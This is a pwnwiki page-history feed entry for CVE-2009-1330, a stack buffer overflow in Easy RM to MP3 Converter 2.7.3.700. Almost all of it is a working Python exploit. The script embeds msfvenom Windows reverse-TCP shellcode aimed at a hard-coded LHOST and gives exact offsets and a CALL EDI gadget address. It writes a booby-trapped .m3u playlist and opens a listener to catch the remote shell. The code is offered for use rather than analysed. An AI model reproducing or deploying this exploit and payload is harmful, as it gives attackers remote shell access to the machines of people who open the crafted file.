https://pwnwiki.com/index.php?action=history&feed=atom&title=CVE-2009-1330_Easy_RM_to_MP3_Converter%E5%A0%86%E6%A3%A7%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E
CVE-2009-1330 Easy RM to MP3 Converter堆棧緩衝區溢出漏洞 - Revision history
2026-04-10T14:34:34Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=CVE-2009-1330_Easy_RM_to_MP3_Converter%E5%A0%86%E6%A3%A7%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E&diff=894&oldid=prev
Pwnwiki: Created page with "==INFO== <pre> # CVE-2009-1330 Exploit for buffer overflow in Easy RM to MP3 Converter 2.7.3.700 (CVE-2009-1330) Based on: * pwntools * msfvenom / reverse\_tcp payload * rop..."
2021-04-02T03:40:09Z
<p>Created page with "==INFO== <pre> # CVE-2009-1330 Exploit for buffer overflow in Easy RM to MP3 Converter 2.7.3.700 (CVE-2009-1330) Based on: * pwntools * msfvenom / reverse\_tcp payload * rop..."</p>
<p><b>New page</b></p><div>==INFO==<br />
<pre><br />
# CVE-2009-1330<br />
<br />
Exploit for buffer overflow in Easy RM to MP3 Converter 2.7.3.700 (CVE-2009-1330)<br />
<br />
Based on:<br />
* pwntools<br />
* msfvenom / reverse\_tcp payload<br />
* ropper<br />
* x64dbg<br />
* Easy RM to MP3 Converter 2.7.3.700<br />
<br />
Vulnerable app available at https://www.exploit-db.com/exploits/10374<br />
<br />
</pre><br />
<br />
==EXP==<br />
<pre><br />
#!/usr/bin/env python<br />
#<br />
# CVE-2009-1330 using:<br />
# * pwntools<br />
# * msfvenom / reverse_tcp payload<br />
# * ropper<br />
# * x64dbg<br />
# * Easy RM to MP3 Converter 2.7.3.700<br />
#<br />
# Vulnerable app available at https://www.exploit-db.com/exploits/10374<br />
<br />
from pwn import p32, listen<br />
from threading import Thread<br />
<br />
<br />
def generate_payload():<br />
# EIP controlled on offset 82179<br />
# EDI points to shellcode at offset 9926<br />
<br />
# msfvenom -p windows/shell_reverse_tcp EXITFUNC=thread LPORT=4444 -a x86<br />
# LHOST=192.168.15.101 -f python --platform windows -b "\x00\x0a\x0d"<br />
shellcode = "\x90" * 10 # small NOP slide<br />
shellcode += "\xbf\x70\xf9\x1b\x1c\xda\xd0\xd9\x74\x24\xf4\x5e"<br />
shellcode += "\x29\xc9\xb1\x52\x31\x7e\x12\x03\x7e\x12\x83\xb6"<br />
shellcode += "\xfd\xf9\xe9\xca\x16\x7f\x11\x32\xe7\xe0\x9b\xd7"<br />
shellcode += "\xd6\x20\xff\x9c\x49\x91\x8b\xf0\x65\x5a\xd9\xe0"<br />
shellcode += "\xfe\x2e\xf6\x07\xb6\x85\x20\x26\x47\xb5\x11\x29"<br />
shellcode += "\xcb\xc4\x45\x89\xf2\x06\x98\xc8\x33\x7a\x51\x98"<br />
shellcode += "\xec\xf0\xc4\x0c\x98\x4d\xd5\xa7\xd2\x40\x5d\x54"<br />
shellcode += "\xa2\x63\x4c\xcb\xb8\x3d\x4e\xea\x6d\x36\xc7\xf4"<br />
shellcode += "\x72\x73\x91\x8f\x41\x0f\x20\x59\x98\xf0\x8f\xa4"<br />
shellcode += "\x14\x03\xd1\xe1\x93\xfc\xa4\x1b\xe0\x81\xbe\xd8"<br />
shellcode += "\x9a\x5d\x4a\xfa\x3d\x15\xec\x26\xbf\xfa\x6b\xad"<br />
shellcode += "\xb3\xb7\xf8\xe9\xd7\x46\x2c\x82\xec\xc3\xd3\x44"<br />
shellcode += "\x65\x97\xf7\x40\x2d\x43\x99\xd1\x8b\x22\xa6\x01"<br />
shellcode += "\x74\x9a\x02\x4a\x99\xcf\x3e\x11\xf6\x3c\x73\xa9"<br />
shellcode += "\x06\x2b\x04\xda\x34\xf4\xbe\x74\x75\x7d\x19\x83"<br />
shellcode += "\x7a\x54\xdd\x1b\x85\x57\x1e\x32\x42\x03\x4e\x2c"<br />
shellcode += "\x63\x2c\x05\xac\x8c\xf9\x8a\xfc\x22\x52\x6b\xac"<br />
shellcode += "\x82\x02\x03\xa6\x0c\x7c\x33\xc9\xc6\x15\xde\x30"<br />
shellcode += "\x81\xd9\xb7\x35\x34\xb2\xc5\x49\xa7\x1e\x43\xaf"<br />
shellcode += "\xad\x8e\x05\x78\x5a\x36\x0c\xf2\xfb\xb7\x9a\x7f"<br />
shellcode += "\x3b\x33\x29\x80\xf2\xb4\x44\x92\x63\x35\x13\xc8"<br />
shellcode += "\x22\x4a\x89\x64\xa8\xd9\x56\x74\xa7\xc1\xc0\x23"<br />
shellcode += "\xe0\x34\x19\xa1\x1c\x6e\xb3\xd7\xdc\xf6\xfc\x53"<br />
shellcode += "\x3b\xcb\x03\x5a\xce\x77\x20\x4c\x16\x77\x6c\x38"<br />
shellcode += "\xc6\x2e\x3a\x96\xa0\x98\x8c\x40\x7b\x76\x47\x04"<br />
shellcode += "\xfa\xb4\x58\x52\x03\x91\x2e\xba\xb2\x4c\x77\xc5"<br />
shellcode += "\x7b\x19\x7f\xbe\x61\xb9\x80\x15\x22\xd9\x62\xbf"<br />
shellcode += "\x5f\x72\x3b\x2a\xe2\x1f\xbc\x81\x21\x26\x3f\x23"<br />
shellcode += "\xda\xdd\x5f\x46\xdf\x9a\xe7\xbb\xad\xb3\x8d\xbb"<br />
shellcode += "\x02\xb3\x87"<br />
<br />
filler1 = 'A' * 9926<br />
filler2 = 'B' * (82179 - len(filler1) - len(shellcode))<br />
CALL_EDI_ADDR = p32(0x100304ec) # gadget from MSRMfilter03.dll<br />
<br />
return filler1 + shellcode + filler2 + CALL_EDI_ADDR<br />
<br />
<br />
def attack():<br />
payload = generate_payload()<br />
fname = "input.m3u"<br />
<br />
f = open(fname, "w")<br />
f.write(payload)<br />
f.close()<br />
<br />
print("File {} has been created.".format(fname))<br />
print("Please use target software to open payload.")<br />
<br />
<br />
if __name__ == "__main__":<br />
# set target info<br />
LHOST = "127.0.0.1"<br />
LPORT = 4444<br />
<br />
thread = Thread(target=attack)<br />
thread.start()<br />
<br />
listener = listen(port=LPORT)<br />
listener.wait_for_connection()<br />
listener.interactive()<br />
<br />
thread.join()<br />
<br />
</pre></div>
Pwnwiki